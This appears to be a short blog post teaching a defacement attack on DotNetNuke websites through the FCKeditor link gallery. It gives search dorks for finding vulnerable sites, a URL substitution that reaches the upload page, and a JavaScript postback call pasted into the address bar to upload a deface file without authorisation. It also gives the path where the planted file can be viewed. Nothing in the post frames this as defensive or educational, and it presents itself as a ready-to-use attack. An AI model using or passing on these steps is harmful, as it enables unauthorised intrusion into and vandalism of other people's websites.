info -: dnn {Dot net nuke}
10% websites are vulnerable and very short method
use firefox for this attack!!
find vulnerable website using any of the following dork -:
inurl: "fck/fcklinkgallery.aspx"
inurl:/tabid/36/language/en-US/Default.aspx
inurl:"Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"
{for specific attack}
if you are in the home page Do this -:
home page =>
http://www.website.com/Home/tabid/36/language/en-US/Default.aspx
replacing =>
/Home/tabid/36/language/en-US/Default.aspx
with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
now select the third option { FILE }
now run this script in address bar -:
javascript:__doPostBack('ctlURL$cmdUpload','')
now if the attack works you will able to upload deface and the website will over! :p
to view hack website use -:
http://www.hackedwebsite/Portals/0/yourdeface.txt
No comments:
Post a Comment